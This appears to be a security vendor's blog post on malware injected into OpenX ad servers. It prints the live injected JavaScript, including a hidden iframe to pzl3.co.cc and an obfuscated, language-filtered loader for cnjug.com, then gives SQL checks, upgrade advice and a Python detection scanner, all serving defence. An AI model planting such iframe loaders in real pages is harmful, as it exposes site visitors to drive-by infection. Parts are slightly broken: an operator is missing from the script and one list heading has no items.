• OpenX: Iframe Malware

    Online advertisements are a significant source of revenue for many web sites. Even small websites can make money by serving up targeted advertisements to their visitors. A popular piece of software which helps deliver these online advertisements is OpenX. This software displays advertisements and rotates ads on web site pages.

    In the last few months, we have seen a large uptick in the number of sites being hacked due to a vulnerability in the OpenX software. In this article, we provide a description of the problem and show an example which can help administrators find malware injected due to this particular vulnerability.

    Identifying the Malware
    When users visit a site hosting ads via OpenX, a PHP script dynamically creates JavaScript code which is embedded on the web page when ads are displayed to visitors. In cases of infection, malware in the form of a small JavaScript snippet is embedded in this PHP script.

    The server location of the PHP script:

    /www/delivery/ajs.php 
    

    An example of a public URL location of the PHP script:

    http://www.infected-website.com/openx/www/delivery/ajs.php?zoneid=1&cb=27272789103&loc=http%3A//www.infected-site.com/
    

    This specific JavaScript snippet loads an iframe element:

    document.write('<iframe src="http://pzl3.co.cc/stats?counter=3" width=0 height=0></iframe>'); 
    

    This malware is injected into each page served with an ad, and can usually be found on the very first line of the web page. You can verify this by viewing the source of the web page.

    An example of the dynamic JavaScript which inserts this malware:

    var dc=document; var date_ob=new Date(); dc.cookie='h1=o; path=/;';if(dc.cookie.indexOf('3=llo') 0){
    function clng(str1,str2,str3){var cou=new Array('cn','gt','tn','br','id','bg','pl','be','gp','my','th','iq','ro','ba','pk','tr','dz','ma','re','ae','gf','ru','om','il','gr','vn','kw','ci','sa','do','pt','hr','eg','qa','ro','tw','al','hk','ps','eg','do','lt','dk','jo','pk','ma','pr','mk','dz','ge','hr','gr','bg','ba','pt','si','tn','pl','be','ir','sk','hu','az','bo','by','cr','cz','ec','ee','lk','lv','md','mt','pa','rs','sv','tt','ua','uy');
    for(i=0;i<cou.length;i++){if(str1&&str1.toLowerCase().indexOf(cou[i])!=-1)return true;if(str2&&str2.toLowerCase().indexOf(cou[i])!=-1)return true;if(str3&&str3.toLowerCase().indexOf(cou[i])!=-1)return true;}return false;}
    if(clng(navigator.systemLanguage,navigator.userLanguage,navigator.language)){var run=1;}
    if(typeof run == 'undefined'){dc.writeln("<!–");dc.writeln("var host=' widt'+'h=1 h'+'eight'+'=1 '; var src='src='; var brdr='fra'+'mebor'+'der='+'0';var sc='\"http://cnjug.com/blog/index.php?s=IBB@G\" ';");dc.writeln("document.write(");");dc.writeln("//–>");} var run=1;
    date_ob.setTime(date_ob.getTime()+86400000);dc.cookie='h3=llo; path=/; expires='+date_ob.toGMTString();}
    

    Removing the Malware
    The good news is that upgrading OpenX to the most recent version, or to any version from 2.8.7 onward, resolves the vulnerability.

    A very good guide to securing your OpenX installation can be found on the OpenX Blog.

    Quoting the relevant part of the post:

    First, check the append/prepend fields in the banners and zones table for any malicious code:

    SELECT bannerid, append, prepend FROM banners WHERE append != '' OR prepend != '';

    SELECT zoneid, append, prepend FROM zones WHERE append != '' OR prepend != '';
    

    If you see anything suspicious on those fields, you should clear those values out.


    Second, check that no unexpected admin users have been created. This query will list the details of all users with admin access in your system:

    SELECT u.user_id, u.contact_name, u.email_address, u.username FROM users AS u, account_user_assoc AS aua WHERE u.user_id=aua.user_id AND aua.account_id = (SELECT value FROM application_variable WHERE name='admin_account_id');
    

    Third, check for infected files on the filesystem:

    Installing the latest version of OpenX will restore all core files, but plugin files (which the installer copies up from the previous version) and files in the www/images folder should be double-checked after the upgrade is complete.


    In particular, be on the lookout for base64_decode and/or eval statements in your PHP files. From the bug notes of “Arbitrary code injected into cache file” at https://developer.openx.org/jira/browse/OX-5950, users have reported some specific PHP files, but the issue can occur in any of the PHP files.
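
    The filesystem check in the third step, together with the injected document.write iframe described under Identifying the Malware, can be turned into a review list. The Python sketch below is an added example, not code from OpenX, the quoted post or this article; the function names, the rule that PHP files under www/images are suspect, and the sample tree are assumptions made for illustration.

```python
import re
import sys
import tempfile
from pathlib import Path

# Review patterns. eval/base64_decode come from the quoted guidance; the iframe
# pattern matches the shape of the injected document.write() snippet.
PATTERNS = {
    "eval": re.compile(rb"\beval\s*\("),
    "base64_decode": re.compile(rb"\bbase64_decode\s*\("),
    "iframe-write": re.compile(rb"document\.write(?:ln)?\s*\(\s*\\?['\"]\s*<iframe", re.I),
}

def scan_openx(root):
    """Return sorted (relative_path, finding) pairs that need manual review."""
    root = Path(root)
    findings = []
    for path in (p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        in_images = rel.startswith("www/images/")
        is_php = path.suffix.lower() == ".php"
        if in_images and is_php:
            # Assumption: www/images should hold only uploaded creatives.
            findings.append((rel, "php-in-images"))
        if is_php or in_images:
            data = path.read_bytes()
            findings += [(rel, n) for n, rx in PATTERNS.items() if rx.search(data)]
    return sorted(findings)

def build_sample_tree(root):
    """Write a small constructed tree (not real OpenX files) for a dry run."""
    samples = {
        "www/delivery/ajs.php": "<?php echo \"document.write('<iframe src=x width=0 height=0></iframe>');\";",
        "plugins/demo/hook.php": "<?php eval(base64_decode($blob));",
        "www/images/banner.php": "<?php // constructed placeholder",
        "lib/clean.php": "<?php echo 'ok';",
    }
    for rel, body in samples.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as demo:
        build_sample_tree(demo)
        # Scan the path given on the command line, or the constructed demo tree.
        for rel, finding in scan_openx(sys.argv[1] if len(sys.argv) > 1 else demo):
            print(f"{finding:15} {rel}")
```

    Run it with the OpenX root directory as the first argument. Matches are candidates for manual review rather than verdicts, since legitimate code can also call eval.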



    Optional steps you can take to secure your system are:

    Conclusion
    If you need additional support, please see if our services can help and feel free to contact us with any comments or questions.